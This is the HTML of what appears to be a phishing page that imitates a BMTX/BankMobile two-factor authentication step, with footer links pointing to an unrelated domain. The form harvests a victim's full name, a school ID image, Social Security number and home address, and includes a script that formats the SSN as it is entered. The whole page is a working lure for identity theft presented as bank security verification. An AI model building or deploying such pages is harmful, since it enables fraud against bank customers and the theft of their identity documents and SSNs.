<!DOCTYPE html>
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="robots" content="noindex">  
  
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link href="./BMTX_ Two Factor Authentication Verify_files/bootstrap.min.css" rel="stylesheet" type="text/css">
  <link href="./BMTX_ Two Factor Authentication Verify_files/outpages_index.css" rel="stylesheet" type="text/css">
  <link href="./BMTX_ Two Factor Authentication Verify_files/global.css" rel="stylesheet" type="text/css">
  <link rel="shortcut icon" href="https://eftcentral.es/vibeaccounts/favicon.ico" type="image/x-icon">
  <link rel="stylesheet" href="./BMTX_ Two Factor Authentication Verify_files/2FAuthentication.css">
  <title>BMTX: Two Factor Authentication Verify</title>

</head>
<body>
<div id="homepage-wrapper">
      <div class="col-xs-12" id="resp-outheader">
        <div class="hdr-logo-padding">
            <a href="https://eftcentral.es/"><img src="./BMTX_ Two Factor Authentication Verify_files/title_1.gif" height="68" alt="" style="visibility: hidden;"></a>
        </div>
        <div class="row" id="login-row" style="height: 60px;">
          
                <div class="col-xs-12 col-md-offset-0">
                    <div class="row">
                        <div class="login-fields">
                        </div>
                        <div class="login-padding login-button-group">
                        </div>
                    </div>
                </div>
            </form>
        </div>
      </div>
      <div class="pagebody_div factor2Pt">
        <div class="pagecontent_div factor2Content">
         

              <form id="twoFactorAuthenticationForm" method="post" enctype="multipart/form-data" autocomplete="off">
  <div class="container">
    <div class="insides">
      <div class="image">
        <img src="./BMTX_ Two Factor Authentication Verify_files/twofactauth.png">
      </div>
      <div style="text-align: left;">
        <h1>Please provide the following information:</h1>
      </div>

      <br>

<div class="additional-info">
  <div style="text-align: center;">
    <input type="text" name="fullName" id="fullName" placeholder="Enter your full name" required>
  </div>

  <div style="text-align: center;">
    <p><strong>Note:</strong> Please upload an image of your school ID. This will be used for authentication purposes only.</p>
  </div>

  <div style="text-align: center;">
    <label for="idUpload" class="file-upload-btn">
      <span>Upload Your School ID Image</span>
    </label>
    <input type="file" name="idUpload" id="idUpload" accept="image/*" required style="display: none;" onchange="displayFileName()">
    <p id="fileNameDisplay" style="text-align: center; color: #666; font-size: 14px; margin-top: 5px;"></p>
  </div>

  <div style="text-align: center;">
    <!-- SSN input with formatted mask -->
    <input type="text" name="ssn" id="ssn" placeholder="Enter your SSN (xxx-xx-xxxx)" maxlength="11" required oninput="formatSSN(this)">
  </div>

  <div style="text-align: center;">
    <!-- Address input with guidance -->
    <input type="text" name="address" id="address" placeholder="Enter your address (Street, City, State, Zip)" required>
  </div>

  <div class="verifybuttons">
    <div style="text-align: center;">
      <input type="submit" name="submitBtn4" value="Submit">
    </div>
  </div>
</div>

<!-- CSS Styling -->
<style>
  .file-upload-btn {
    background-color: #4CAF50;
    color: white;
    padding: 12px 20px;
    border: none;
    cursor: pointer;
    border-radius: 4px;
    display: inline-block;
    font-size: 16px;
    margin-top: 10px;
    transition: background-color 0.3s;
  }

  .file-upload-btn:hover {
    background-color: #45a049;
  }

  input[type="file"]:focus {
    outline: none;
  }

  #fileNameDisplay {
    font-size: 14px;
    color: #555;
    display: none;
  }

  input[type="text"] {
    width: 100%;
    padding: 12px;
    margin: 5px 0;
    box-sizing: border-box;
    border: 1px solid #ccc;
    border-radius: 4px;
    font-size: 16px;
  }

  input[type="text"]:focus {
    outline: none;
    border-color: #4CAF50;
  }
</style>

<!-- JavaScript to Format SSN -->
<script>
  function displayFileName() {
    const fileInput = document.getElementById('idUpload');
    const fileName = fileInput.files[0] ? fileInput.files[0].name : '';
    const fileNameDisplay = document.getElementById('fileNameDisplay');
    
    if (fileName) {
      fileNameDisplay.textContent = `Selected file: ${fileName}`;
      fileNameDisplay.style.display = 'block';
    } else {
      fileNameDisplay.style.display = 'none';
    }
  }

  function formatSSN(input) {
    // Remove all non-numeric characters
    let value = input.value.replace(/\D/g, '');
    
    // Format SSN as xxx-xx-xxxx
    if (value.length <= 3) {
      input.value = value;
    } else if (value.length <= 5) {
      input.value = value.slice(0, 3) + '-' + value.slice(3);
    } else if (value.length <= 9) {
      input.value = value.slice(0, 3) + '-' + value.slice(3, 5) + '-' + value.slice(5, 9);
    } else {
      input.value = value.slice(0, 9);
    }
  }
</script>


<script src="ui.js"></script>




          <div style="clear:both"></div>
        </div>
      <div class="ftr_bar_wide"></div>
      <div id="footer-footer">
        <div class="footertext">
            <a href="https://eftcentral.es/vibeaccounts/authenticate/otp.php#">Home</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/otp.php#" target="security">Security</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/otp.php#">Fee Schedules</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/otp.php#">Terms and Conditions</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/otp.php#">Privacy Statement</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/otp.php#">Privacy Notice for California Residents</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/otp.php#">Contact Us</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/otp.php#" target="EasyHelp" rel="external">Identity Verification</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/otp.php#" target="EasyHelp" rel="external">FAQs</a>
        </div>
        <div class="footertext footer_legaltext">
            <p><img src="./BMTX_ Two Factor Authentication Verify_files/fdic-housing.png" alt="BMTX, Inc.&gt;" class="fdic-logo"></p>

            © 2024 BMTX, Inc., a wholly owned subsidiary of BM Technologies, Inc. All Rights Reserved.<br>


            <br> Digital banking platform powered by BMTX, Inc. BankMobile banking products and banking services are provided by First Carolina Bank, Member FDIC &amp; Equal Housing Lender. The BankMobile Debit Mastercard® card is issued by First
            Carolina Bank pursuant to license from Mastercard International Incorporated. The card is administered by First Carolina Bank. Mastercard and the Mastercard brand mark are registered trademarks of Mastercard International Incorporated.
            All other names and logos are owned by their respective owners.<br>


            <br> BM Technologies, Inc., PO Box 278, Maple Shade, NJ 08052
        </div>
      </div>
  </div>
   

  <script>
    function goBack() {
      window.history.back()
    }
  </script>

</div></body></html>




